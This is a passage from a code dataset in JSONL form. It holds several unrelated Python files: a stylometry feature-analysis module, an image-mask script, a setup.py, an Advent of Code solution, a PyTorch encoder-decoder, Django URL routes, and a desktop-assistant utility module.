+ three author names and displays a scatter\n plot of avg word length vs avg sentence length\n\n \"\"\"\n sample1 = np.random.choice(set1_inds, 2000, replace=False)\n sample2 = np.random.choice(set2_inds, 2000, replace=False)\n sample3 = np.random.choice(set3_inds, 2000, replace=False)\n\n plt.plot(x1[sample1], x2[sample1], marker='.', markersize=15, linestyle='none', color='b', alpha=.1, label=set1_label)\n plt.plot(x1[sample2], x2[sample2], marker='.', markersize=15, linestyle='none', color='g', alpha=.1, label=set2_label)\n plt.plot(x1[sample3], x2[sample3], marker='.', markersize=15, linestyle='none', color='#990000', alpha=.1, label=set3_label)\n plt.legend()\n plt.gca().set_xlabel('Average sentence length')\n plt.gca().set_ylabel('Average word length')\n return plt.gcf()\n\nclass FeatureAnalysis():\n def __init__(self,\n input_table='chunks',\n word_n_highest=200,\n unigram_n_highest=100,\n trigram_n_highest=100,\n pentagram_n_highest=200,\n feature_file=None,\n colnames_file=None):\n\n self.input_table = input_table\n self.word_n_highest = word_n_highest\n self.unigram_n_highest = unigram_n_highest\n self.trigram_n_highest = trigram_n_highest\n self.pentagram_n_highest = pentagram_n_highest\n\n # Cache\n self.reset_cache()\n\n logger.info('Beginning new analysis with following params:')\n logger.info('input_table = {}'.format(self.input_table))\n logger.info('word_n_highest = {}'.format(self.word_n_highest))\n logger.info('unigram_n_highest = {}'.format(self.unigram_n_highest))\n logger.info('trigram_n_highest = {}'.format(self.trigram_n_highest))\n logger.info('pentagram_n_highest = {}'.format(self.pentagram_n_highest))\n\n if feature_file:\n logger.info('loading features from disk'.format(self.pentagram_n_highest))\n self.get_features(feature_file=feature_file, colnames_file=colnames_file)\n\n def reset_cache(self):\n self.feature_matrix = None\n self.colnames = None\n self.docs = None\n\n def load_count_matrix(self, table_name):\n \"\"\" Load word counts from database\n\n Parameters\n ----------\n table_name : str\n name of the count table\n\n Returns\n -------\n lut : dict\n Mapping from matrix column indices to symbols\n counts : scipy.sparse.csr_matrix\n Count matrix\n \"\"\"\n lut = dict([(x.col, x.symbol) for x in pd.read_sql_table(table_name + '_lut', dbengine).itertuples()])\n counts = pd.read_sql_table(table_name, dbengine, index_col='index').sort_index()\n counts = scipy.sparse.vstack(pickle.loads(x) for x in counts.symbol_counts)\n return lut, counts\n\n def select_top_counts(self, lut, counts, n_highest, colnames_dict=None):\n \"\"\" Select top ranking counts\n\n Parameters\n ----------\n lut : list\n List of symbols which determines the order of\n columns in the output matrix\n counts : scipy.sparse.csr_matrix\n Count matrix\n n_highest : int\n how many to keep\n colnames_dict: dict\n Mapping from colnames -> inds in final feature matrix.\n Used to match previously computed feature columns to new\n ones.\n\n Returns\n -------\n symbols : list of str\n list of symbols in new reduced matrix\n counts : scipy.sparse.csr_matrix\n matrix containing only the top ranked columns\n \"\"\"\n if colnames_dict:\n inds = [n for n, x in enumerate(lut) if x in colnames_dict]\n else:\n inds = np.argsort(np.asarray(counts.sum(axis=0)).flatten())[-n_highest:]\n\n symbols = [lut[i] for i in inds]\n counts = counts[:, inds]\n return symbols, counts\n\n def get_features(self, feature_file=None, colnames_file=None):\n if self.feature_matrix is None:\n def get_subtable(name):\n return self.input_table + '_' + name\n\n logger.debug('loading documents')\n docs = pd.read_sql_table(self.input_table, dbengine, index_col='index').sort_index()\n self.docs = docs\n\n if feature_file:\n self.feature_matrix = pickle.load(open(feature_file, 'rb'))\n self.colnames = pickle.load(open(colnames_file, 'rb'))\n else:\n logger.debug('loading numeric features')\n features = pd.read_sql_table(get_subtable('features'), dbengine, index_col='index').sort_index().drop('length', axis=1)\n feature_names = list(features.columns)\n features = csr_matrix(features)\n\n logger.debug('loading word counts')\n words, word_count = self.select_top_counts(*self.load_count_matrix(get_subtable('word_count')), self.word_n_highest)\n logger.debug('loading unigram counts')\n unigrams, unigram_count = self.select_top_counts(*self.load_count_matrix(get_subtable('1gram_count')), self.unigram_n_highest)\n logger.debug('loading trigram counts')\n trigrams, trigram_count = self.select_top_counts(*self.load_count_matrix(get_subtable('3gram_count')), self.trigram_n_highest)\n logger.debug('loading pentagram counts')\n pentagrams, pentagram_count = self.select_top_counts(*self.load_count_matrix(get_subtable('5gram_count')), self.pentagram_n_highest)\n\n colnames = dict(zip(range(0, len(feature_names + words + unigrams + trigrams + pentagrams)),\n feature_names + words + unigrams + trigrams + pentagrams))\n self.colnames = colnames\n\n feature_matrix = scipy.sparse.hstack((features, word_count, unigram_count, trigram_count, pentagram_count)).tocsr()\n self.feature_matrix = feature_matrix\n\n return self.feature_matrix, self.colnames, self.docs\n\n def compute_new_features(self, new_docs, nlp, old_lut, colnames_dict):\n \"\"\"Takes new documents and returns feature matrix and column names. Uses `nlp`\n and `colnames_dict` arguments to ensure that the word count and ngram counts are\n calculated using the same underlying set of words/ngrams\n\n Parameters\n ----------\n new_docs : pandas.DataFrame\n New documents/chunks to compute features for\n nlp : spacy.en.English\n spacy model whose nlp.vocab.strings attribute matches\n colnames_dict['word'] contents\n old_lut : dict of set\n dict with fields ['word', 'unigram', 'trigram', 'pentagram'],\n containing sets of words/ngrams in previously computed feature\n set\n colnames_dict : dict of dict\n dict with fields ['feature', 'word', 'unigram', 'trigram',\n 'pentagram'], whose corresponding values are dict-like objects\n mapping symbols to indices in order to make the new column names\n match the old ones\n\n Returns\n -------\n new_feature_matrix : scipy.sparse.csr_matrix\n new_colnames : list of str\n\n \"\"\"\n def reorder_columns(matrix, colnames, inds):\n # take matrix, column names, and dict of colnames -> inds\n # and rearrange the columns\n start = min(inds.values())\n target_cols = [inds[x] - start for x in colnames]\n sort_order = [x[0] for x in sorted(enumerate(target_cols), key=lambda x: x[1])]\n new_colnames = [colnames[i] for i in sort_order]\n new_matrix = matrix[:, sort_order]\n return new_matrix, new_colnames\n\n print('\\nGet numerical features and word counts\\n')\n features, feature_names = spacy_parse_docs(nlp, new_docs)\n\n word_counters = [NGramCounter(counts=wc) for wc in features.word_count]\n word_counters[0].reconcile(old_lut['word'])\n mat, hashes = count_dicts_to_sparse(features.word_count)\n names = [nlp.vocab.strings[int(h)] for h in hashes]\n words, word_count = self.select_top_counts(names, mat, self.word_n_highest, colnames_dict['word'])\n word_count, words = reorder_columns(word_count, words, colnames_dict['word'])\n\n # Drop extraneous/unused columns\n features = features.drop(['word_count', 'length'], axis=1)\n feature_names = list(features.columns)\n features = csr_matrix(features)\n\n # Reorder feature columns\n features, feature_names = reorder_columns(features, feature_names, colnames_dict['feature'])\n\n print('\\nCount character 1grams\\n')\n unigram_counters = count_char_ngrams(new_docs, 1)\n unigram_counters[0].reconcile(old_lut['unigram'])\n mat, names = count_dicts_to_sparse([x.counts for x in unigram_counters])\n unigrams, unigram_count = self.select_top_counts(names, mat, self.unigram_n_highest, colnames_dict['unigram'])\n unigram_count, unigrams = reorder_columns(unigram_count, unigrams, colnames_dict['unigram'])\n\n print('\\nCount character 3grams\\n')\n trigram_counters = count_char_ngrams(new_docs, 3)\n trigram_counters[0].reconcile(old_lut['trigram'])\n mat, names = count_dicts_to_sparse([x.counts for x in trigram_counters])\n trigrams, trigram_count = self.select_top_counts(names, mat, self.trigram_n_highest, colnames_dict['trigram'])\n trigram_count, trigrams = reorder_columns(trigram_count, trigrams, colnames_dict['trigram'])\n\n print('\\nCount character 5grams\\n')\n pentagram_counters = count_char_ngrams(new_docs, 5)\n pentagram_counters[0].reconcile(old_lut['pentagram'])\n mat, names = count_dicts_to_sparse([x.counts for x in pentagram_counters])\n pentagrams, pentagram_count = self.select_top_counts(names, mat, self.pentagram_n_highest, colnames_dict['pentagram'])\n pentagram_count, pentagrams = reorder_columns(pentagram_count, pentagrams, colnames_dict['pentagram'])\n print('\\ndone\\n')\n\n new_colnames = dict(zip(range(0, len(feature_names + words + unigrams + trigrams + pentagrams)),\n feature_names + words + unigrams + trigrams + pentagrams))\n new_feature_matrix = scipy.sparse.hstack((features, word_count, unigram_count, trigram_count, pentagram_count)).tocsr()\n\n return new_feature_matrix, new_colnames\n\ndef run_logistic_regression(features, docs, shuffle_labels=False, pca_dims=None):\n encoder = LabelEncoder()\n labels = encoder.fit_transform(docs.author)\n if shuffle_labels:\n np.random.shuffle(labels)\n\n if pca_dims:\n pca = PCA(n_components=pca_dims)\n features = pca.fit_transform(features)\n\n X_train, X_test, y_train, y_test = train_test_split(features,\n labels,\n test_size=.2,\n random_state=9,\n stratify=labels)\n\n logger.debug('fitting logistic regression')\n lr = LogisticRegression(C=1,\n multi_class='multinomial',\n solver='lbfgs',\n max_iter=1000,\n verbose=1,\n random_state=9)\n\n lr.fit(X_train, y_train)\n y_pred = lr.predict(X_test)\n\n cm = confusion_matrix(y_test, y_pred)\n acc = accuracy_score(y_test, y_pred)\n f1 = f1_score(y_test, y_pred, average='micro')\n\n logger.info('\\n' + classification_report(y_test,\n y_pred,\n labels=np.unique(labels),\n target_names=encoder.inverse_transform(np.unique(labels))))\n logger.info('Accuracy: {}'.format(acc))\n logger.info('F1: {}'.format(f1))\n logger.info('Confusion matrix:\\n{}'.format(cm))\n\n return lr, acc, f1, cm\n\ndef run_lda(features, docs, shuffle_labels=False):\n encoder = LabelEncoder()\n labels = encoder.fit_transform(docs.author)\n if shuffle_labels:\n np.random.shuffle(labels)\n\n X_train, X_test, y_train, y_test = train_test_split(features,\n labels,\n test_size=.2,\n random_state=9,\n stratify=labels)\n\n logger.debug('fitting linear discriminant analysis')\n lda = LinearDiscriminantAnalysis()\n\n lda.fit(X_train, y_train)\n y_pred = lda.predict(X_test)\n\n cm = confusion_matrix(y_test, y_pred)\n acc = accuracy_score(y_test, y_pred)\n f1 = f1_score(y_test, y_pred, average='micro')\n\n logger.info('\\n' + classification_report(y_test,\n y_pred,\n labels=np.unique(labels),\n target_names=encoder.inverse_transform(np.unique(labels))))\n logger.info('Accuracy: {}'.format(acc))\n logger.info('F1: {}'.format(f1))\n logger.info('Confusion matrix:\\n{}'.format(cm))\n\n return lda, acc, f1, cm\n\ndef tsne2d(features, docs, seed, pca_first=True, *args, **kwargs):\n \"\"\"\n Parameters\n ----------\n features\n inputs in high-D feature space\n docs\n input documents\n seed : int\n seed for numpy RNG\n *args, **kwargs\n args for TSNE (see sklearn docs)\n Returns\n -------\n flat : np.array\n 2d t-sne embedding\n indices\n indices of the subset of documents used\n \"\"\"\n np.random.seed(seed)\n shuffle = np.arange(features.shape[0])\n np.random.shuffle(shuffle)\n\n features_subset = features[shuffle,:]\n features_subset = features_subset[:30000,:]\n\n docs_subset = docs.iloc[shuffle]\n docs_subset = docs_subset.iloc[:30000]\n\n if pca_first:\n tsvd = TruncatedSVD(n_components=100)\n features_r = tsvd.fit_transform(features_subset)\n else:\n features_r = features_subset\n\n tsne = TSNE(*args, **kwargs)\n flat = tsne.fit_transform(features_r)\n\n return flat, docs_subset.index\n\ndef load_old_colnames(colnames_file, n_feature, n_word, n_unigram, n_trigram, n_pentagram):\n colnames = pickle.load(open(colnames_file, 'rb'))\n colnames_l = [x[1] for x in sorted(colnames.items(), key=lambda x: x[0])]\n colnames_dict = {}\n\n ind = 0\n colnames_dict['feature'] = dict(zip(colnames_l[ind:ind+n_feature], range(ind,ind+n_feature)))\n ind += n_feature\n colnames_dict['word'] = dict(zip(colnames_l[ind:ind+n_word], range(ind,ind+n_word)))\n ind += n_word\n colnames_dict['unigram'] = dict(zip(colnames_l[ind:ind+n_unigram], range(ind,ind+n_unigram)))\n ind += n_unigram\n colnames_dict['trigram'] = dict(zip(colnames_l[ind:ind+n_trigram], range(ind,ind+n_trigram)))\n ind += n_trigram\n colnames_dict['pentagram'] = dict(zip(colnames_l[ind:ind+n_pentagram], range(ind,ind+n_pentagram)))\n\n return colnames_dict\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-t', '--task', action='append')\n args = parser.parse_args()\n tasks = args.task\n if not tasks:\n tasks = ['lr', 'lda', 'tsne', 'lr_pca']\n\n analysis = FeatureAnalysis(input_table='chunks',\n word_n_highest=200,\n unigram_n_highest=100,\n trigram_n_highest=100,\n pentagram_n_highest=200)\n\n features, colnames, docs = analysis.get_features()\n os.makedirs(os.path.join(outputdir, 'features'), exist_ok=True)\n pickle.dump(features, open(os.path.join(outputdir, 'features', 'features_200-100-100-200.pkl'), 'wb'))\n pickle.dump(colnames, open(os.path.join(outputdir, 'features', 'colnames_200-100-100-200.pkl'), 'wb'))\n pickle.dump(docs, open(os.path.join(outputdir, 'features', 'docs.pkl'), 'wb'))\n\n if 'lr' in tasks:\n os.makedirs(os.path.join(outputdir, 'classifier'), exist_ok=True)\n\n lr, acc, f1, cm = run_logistic_regression(features, docs)\n pickle.dump(lr, open(os.path.join(outputdir, 'classifier', 'lr_model.pkl'), 'wb'))\n pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lr_results.pkl'), 'wb'))\n\n lr_s, acc_s, f1_s, cm_s = run_logistic_regression(features, docs, shuffle_labels=True)\n pickle.dump(lr_s, open(os.path.join(outputdir, 'classifier', 'lr_shuffledlabels_model.pkl'), 'wb'))\n pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lr_shuffledlabels_results.pkl'), 'wb'))\n\n if 'lda' in tasks:\n os.makedirs(os.path.join(outputdir, 'classifier'), exist_ok=True)\n\n lda, acc, f1, cm = run_lda(features.todense(), docs)\n pickle.dump(lda, open(os.path.join(outputdir, 'classifier', 'lda_model.pkl'), 'wb'))\n pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lda_results.pkl'), 'wb'))\n\n if 'tsne' in tasks:\n for p in [5, 10, 30, 50, 100]:\n flat, inds = tsne2d(features, docs, perplexity=p, n_jobs=8, n_iter=1500)\n\n pickle.dump(flat, open(os.path.join(outputdir, 'tsne_{}.pkl').format(p), 'wb'))\n pickle.dump(list(docs.iloc[inds].author), open(os.path.join(outputdir, 'tsne_authors_{}.pkl').format(p), 'wb'))\n\n fig = visualize_tsne(flat, list(docs.iloc[inds].author))\n fig.savefig(os.path.join(outputdir, 'tsne_{}.png').format(p))\n plt.close('all')\n\n if 'lr_pca' in tasks:\n os.makedirs(os.path.join(outputdir, 'classifier'), exist_ok=True)\n\n for ndim in [2, 5, 9, 50, 100, 200]:\n logger.info('running logistic regression with first {} prin comps'.format(ndim))\n lr, acc, f1, cm = run_logistic_regression(features, docs, pca_dims=ndim)\n pickle.dump(lr_s, open(os.path.join(outputdir, 'classifier', 'lr_pca{}_model.pkl'.format(ndim)), 'wb'))\n pickle.dump({'acc': acc, 'f1': f1, 'cm': cm}, open(os.path.join(outputdir, 'classifier', 'lr_pca{}_results.pkl'.format(ndim)), 'wb'))\n","sub_path":"writing_style_py/features/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":20424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"19529867","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 5 16:25:51 2018\r\n\r\n@author: Dane\r\n\"\"\"\r\n\r\n#Importing Libraries\r\nfrom PIL import Image\r\nimport cv2.cv as cv\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport os\r\n\r\n\r\n\r\n#This is a test to make sure the program runs\r\nprint(\"this is a test\")\r\n\r\n#I will start the actually program here\r\n\r\n#Functions\r\n\r\n#Average white value function\r\n#M is the matrix of greys\r\n#N is the matrix of black and white\r\ndef avg_val_white(M, N):\r\n salts = []\r\n for i in range(N[:, 0]):\r\n for j in range(N[:, [0]]):\r\n if(N[i,j] == 255):\r\n salts.append(M[i,j])\r\n if(len(salts) > 0):\r\n return [np.mean(salts), np.std(salts)]\r\n else:\r\n return\r\n \r\n#Average black value function\r\n#M is the matrix of greys\r\n#N is the matrix of black and white\r\ndef avg_val_black(M, N):\r\n salts = []\r\n for i in range(N[:, 0]):\r\n for j in range(N[:, [0]]):\r\n if(N[i,j] == 0):\r\n salts.append(M[i,j])\r\n if(len(salts) > 0):\r\n return [np.mean(salts), np.std(salts)]\r\n else:\r\n return\r\n\r\n#File handling function\r\ndef open_pics(fileName):\r\n pathS='C:\\\\Users\\\\Dane\\\\Documents\\\\MathResearch\\\\all\\\\train\\\\images\\\\'\r\n pathS=pathS+fileName\r\n pathM='C:\\\\Users\\\\Dane\\\\Documents\\\\MathResearch\\\\all\\\\train\\\\masks\\\\'\r\n pathM=pathM+fileName\r\n m=Image.open(pathS)\r\n m=m.convert('L')\r\n n=Image.open(pathM)\r\n n=n.convert('L')\r\n M=np.array(m.getdata()).reshape(m.size[0],m.size[1])\r\n #M=Matrix(RR,M)\r\n N=np.array(n.getdata()).reshape(n.size[0],n.size[1])\r\n #N=Matrix(RR,N)\r\n return [M,N]\r\n#file line\r\nsaltFile = os.listdir('C:\\\\Users\\\\Dane\\\\Documents\\\\MathResearch\\\\all\\\\train\\\\images\\\\')\r\n\r\n#test functions\r\n\r\npointsB = []\r\nfor f in saltFile:\r\n temp = open_pics(f)\r\n pointsB.append(avg_val_black(temp[0], temp[1]))\r\n\r\ndef plot_test():\r\n plt.plot(pointsB, color = \"red\")\r\n plt.show()\r\n\r\nprint(\"time to test\")","sub_path":"conversion1.py","file_name":"conversion1.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"12323459","text":"#!/usr/bin/env python\n#coding: utf-8\n\nimport sys\nimport codecs\nimport gitTodo\n\nfrom setuptools import setup, find_packages\nfrom setuptools.command.test import test as TestCommand\n\n\nclass PyTest(TestCommand):\n # `$ python setup.py test' simply installs minimal requirements\n # and runs the tests with no fancy stuff like parallel execution.\n def finalize_options(self):\n TestCommand.finalize_options(self)\n self.test_suite = True\n self.test_args = [\n '--verbose',\n './tests'\n ]\n\n def run_tests(self):\n import pytest\n sys.exit(pytest.main(self.test_args))\n\n\ntests_require = [\"pytest\"]\n\ndef long_description():\n \n with codecs.open('README.md', encoding='utf8') as fp:\n return fp.read()\n\n\nsetup(\n name=gitTodo.__prog__,\n version=gitTodo.__version__,\n description=\"Git-todo manage your tasks of a local git repository.\",\n long_description=long_description(),\n download_url='https://github.com/alice1017/gitTodo',\n author=gitTodo.__author__,\n author_email=gitTodo.__author__.split()[-1],\n license=gitTodo.__license__,\n packages=find_packages(),\n entry_points={\n 'console_scripts': [\n 'git-todo = gitTodo.__main__:main',\n ],\n },\n #install_requires=install_requires,\n tests_require=tests_require,\n cmdclass={'test': PyTest},\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.7',\n #'Programming Language :: Python :: 3.3',\n 'Environment :: Console',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Software Development',\n 'Topic :: Terminals',\n 'Topic :: Text Processing',\n 'Topic :: Utilities',\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"320738773","text":"import csv\n\nwith open('data.csv', 'r', encoding = 'utf-8-sig') as f:\n reader = csv.reader(f)\n values = list(reader)\n value = values[0][0]\n\ndef cleanse (val, l1, l2):\n val = val.replace(l1, \"\")\n val = val.replace(l2, \"\")\n return val\n\ndef condense (val):\n\n changed = True\n newVal = ''\n while changed == True:\n newVal = ''\n changed = False\n for i in range(0, len(val), 2):\n if i + 1 < len(val):\n\n if ((val[i].islower() and (val[i].capitalize() == val[i+1])) or (val[i+1].islower() and (val[i+1].capitalize() == val[i]))) == True:\n changed = True\n else:\n newVal += val[i] + val[i+1]\n else:\n newVal += val[i]\n\n if changed == False:\n newVal = newVal[0]\n for i in range(1, len(val), 2):\n if i + 1 < len(val):\n\n if ((val[i].islower() and (val[i].capitalize() == val[i+1])) or (val[i+1].islower() and (val[i+1].capitalize() == val[i]))) == True:\n changed = True\n else:\n newVal += val[i] + val[i+1]\n else:\n newVal += val[i]\n val = newVal\n\n return newVal\n\nlowercaseLetters = [\n \"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\",\"k\",\n \"l\",\"m\",\"n\",\"o\",\"p\",\"q\",\"r\",\"s\",\"t\",\"u\",\n \"v\",\"w\",\"x\",\"y\",\"z\"]\n\nuppercaseLetters = list(map(lambda x: x.capitalize(), lowercaseLetters))\n\nminimum = -1\n\nfor i in range(0, len(lowercaseLetters)):\n print(value)\n filteredVal = cleanse(value, lowercaseLetters[i], uppercaseLetters[i])\n nv = condense(filteredVal)\n if minimum == -1:\n minimum = len(nv)\n else: minimum = min(minimum, len(nv))\n\nprint(minimum)\n","sub_path":"advent-of-code-2018/5/q2.py","file_name":"q2.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"269190913","text":"# full assembly of the sub-parts to form the complete net\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\t\t\nclass EncoderDecoder(nn.Module):\n\tdef __init__(self, n_channels, n_classes):\n\t\tsuper(EncoderDecoder, self).__init__()\n\t\tself.n_classes = n_classes\n\t\tself.encoder = nn.Sequential(\n\t\t\tnn.Conv2d(in_channels=n_channels, out_channels=32, kernel_size=5, stride=1, padding=2), # n_channels Y\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(32, 64, 3, 2, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(64, 64, 3, 1, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(64, 128, 3, 2, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU()\n\t\t)\n\t\tself.dilated_layer = nn.Sequential(\n\t\t\tnn.Conv2d(128, 128, 3, 1, 2, dilation=2),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 4, dilation=4),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 8, dilation=8),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 16, dilation=16),\n\t\t\t\tnn.ReLU()\n\t\t)\n\t\tself.bottle_neck = nn.Sequential(\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU(),\n\t\t\tnn.Conv2d(128, 128, 3, 1, 1),\n\t\t\t\tnn.ReLU()\n\t\t)\n\t\tself.decoder = nn.Sequential(\n\t\t\tnn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n\t\t\t\tnn.Conv2d(128, 128, 3, 1, 1), nn.ReLU(),\n\t\t\t\tnn.Conv2d(128, 128, 3, 1, 1), nn.ReLU(),\n\t\t\tnn.Upsample(scale_factor=2, mode='bilinear', align_corners=True),\n\t\t\t\tnn.Conv2d(128, 64, 3, 1, 1), nn.ReLU(),\n\t\t\t\tnn.Conv2d(64, 64, 3, 1, 1), nn.ReLU(),\n\t\t\tnn.Conv2d(64, self.n_classes, 3, 1, 1)\n\t\t)\n\n\n\tdef forward(self, seg):\n\t\t# bs,c,h,w = img.size()\n\t\t# x = torch.cat([img, seg], dim=1)\n\n\n\t\tx = self.encoder(seg)\n\t\tx = self.dilated_layer(x)\n\t\tx = self.bottle_neck(x)\n\t\tx = self.decoder(x)\n\t\t\n\t\t# x = torch.clamp(x, -1, 1)\n\n\t\t# x = x*(1-mask) + seg\n\t\t# assert x.size() == [bs, self.n_classes, h, w], [ img.size(), x.size() ]\n\t\t# try my probability map first\n\t\t# x = x.view(bs, self.n_classes, h, w)\n\t\t# x = F.softmax(x, 1)\n\t\t# x = x.view(bs, self.n_classes, h, w)\n\t\treturn x\n\n\n\tdef _init_weights(self):\n\t\tdef normal_init(m, mean, stddev, truncated=False):\n\t\t\t\"\"\"\n\t\t\tweight initalizer: truncated normal and random normal.\n\t\t\t\"\"\"\n\t\t\t# x is a parameter\n\t\t\tif truncated:\n\t\t\t\tm.weight.data.normal_().fmod_(2).mul_(stddev).add_(mean) # not a perfect approximation\n\t\t\telse:\n\t\t\t\tm.weight.data.normal_(mean, stddev)\n\t\t\t\tm.bias.data.zero_()\n\t\tfor i in self.encoder:\n\t\t\tif \"conv\" in i.__class__.__name__:\n\t\t\t\tnormal_init(i, 0, 0.01)\n\t\tfor i in self.decoder:\n\t\t\tif \"conv\" in i.__class__.__name__:\n\t\t\t\tnormal_init(i, 0, 0.01)\n\n","sub_path":"src/models/encoder_decoder.py","file_name":"encoder_decoder.py","file_ext":"py","file_size_in_byte":2505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"7392974","text":"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom django.urls.conf import include\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n# from django.views.generic import TemplateView\n\n\nurlpatterns = [\n path('secure_admin/', admin.site.urls),\n path('account/', include('accounts.urls')),\n # path('sw.js', TemplateView.as_view(template_name='user/sw.js', content_type='application/x-javascript'), name='sw.js'), \n path('', include('q_and_a.urls')),\n path('blog/', include('blog.urls')),\n path('profiles/', include('profiles.urls')),\n path('froala_editor/',include('froala_editor.urls')),\n path('community/', include('community.urls')),\n path('tutorials/', include('tutorials.urls')),\n path('admin/', include('admin_app.urls')),\n path('accounts/', include('allauth.urls')),\n path('challenges/', include('challenges.urls')),\n path('chat/', include('chat.urls')),\n # path('webpush/', include('webpush.urls')),\n\n \n] + static(settings.STATIC_URL,document_root=settings.STATIC_ROOT)\n\nurlpatterns +=static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"secondproject/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"592664550","text":"import os\nimport re\nimport subprocess\nimport signal\nimport time\nimport random\n\nimport psutil\nfrom threading import Thread\n\nCOLORS = {\n \"HEADER\": \"\\033[95m\",\n \"OKBLUE\": \"\\033[94m\",\n \"OKGREEN\": \"\\033[92m\",\n \"WARNING\": \"\\033[93m\",\n \"FAIL\": \"\\033[91m\",\n \"BOLD\": \"\\033[1m\",\n \"UNDERLINE\": \"\\033[4m\",\n}\n\n\ndef chatbot_only(func):\n def wrapper(text, interface, assistant):\n if type(interface).__name__ == \"TelegramBot\":\n func(text, interface, assistant)\n\n return wrapper\n\n\ndef voice_only(func):\n def wrapper(text, interface, assistant):\n if type(interface).__name__ == \"VoiceInterface\":\n func(text, interface, assistant)\n\n return wrapper\n\n\ndef server_only(func):\n def wrapper(text, interface, assistant):\n if assistant.on_server:\n func(text, interface, assistant)\n\n return wrapper\n\n\ndef pc_only(func):\n def wrapper(text, interface, assistant):\n if not assistant.on_server:\n func(text, interface, assistant)\n\n return wrapper\n\n\ndef pick_phrase(phrases, me=\"\"):\n return random.choice(phrases).replace(\"{me}\", me)\n\n\ndef os_is_raspbian():\n return os.uname()[1] == \"raspberrypi\"\n\n\ndef get_my_ip(timeout=30):\n start_time = time.time()\n while time.time() - start_time <= timeout:\n try:\n with os.popen(\"ifconfig | grep 'inet 192'\") as process:\n return re.findall(r\"\\d{3}\\.\\d{3}\\.\\d\\.\\d{2,3}\", process.read())[0]\n except IndexError:\n pass\n\ndef device_is_charging():\n with os.popen(\n \"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | grep state\"\n ) as process:\n return bool(\n re.findall(r\"fully-charged| charging|^(?![\\s\\S])\", process.read())\n )\n\n\ndef device_has_battery():\n with os.popen(\n \"upower -i /org/freedesktop/UPower/devices/battery_BAT0 | grep power\"\n ) as process:\n return \"yes\" in process.read()\n\n\ndef colored(text, color=\"WARNING\", frame=True):\n if frame:\n x = \"_\" * len(text) + \"\\n\"\n b = \" \" * len(text) + \"\\n\"\n return (\n COLORS[\"BOLD\"] + COLORS[color] + x + b + text + b + x + \"\\033[0m\"\n )\n else:\n return COLORS[\"BOLD\"] + COLORS[color] + text + \"\\033[0m\"\n\n\ndef thread(targets, wait_to_finish=False):\n for target in targets:\n thr = Thread(target=target)\n thr.start()\n if wait_to_finish is True:\n thr.join()\n\n\ndef screen_is_locked():\n with os.popen(\"loginctl show-user | grep IdleHint\") as process:\n if \"yes\" in process.read():\n return True\n else:\n return False\n\n\ndef turn_screen_off():\n os.system(\"sleep 0.01 && xset -display :0.0 dpms force off\")\n\n\ndef set_output_as_headphones():\n os.system(\n 'pacmd set-default-sink \"alsa_output.pci-0000_00_1f.3.analog-stereo\"'\n )\n\n\ndef get_volume():\n with os.popen(\"amixer -D pulse\") as responce:\n volume = re.findall(r\"Playback.+\\[(\\d{1,3})%\\]\", responce.read())[0]\n return int(volume)\n\n\ndef kill_process(process):\n p = subprocess.Popen([\"ps\", \"-A\"], stdout=subprocess.PIPE)\n out, err = p.communicate()\n for line in out.splitlines():\n if process in line.decode(\"utf-8\"):\n pid = int(line.split(None, 1)[0])\n os.kill(pid, signal.SIGKILL)\n\n\ndef notification(\n message,\n title=\" \",\n time=1000,\n icon=\"~/Dropbox/Jarvis/.icons/J.png\",\n urgency=\"normal\",\n):\n command = 'notify-send \"{}\" \"{}\" -t {} -i {} -u {}'.format(\n title, message, time, icon, urgency\n ) # low, critical\n os.system(command)\n\n\ndef is_running(process_name):\n return process_name in (p.name() for p in 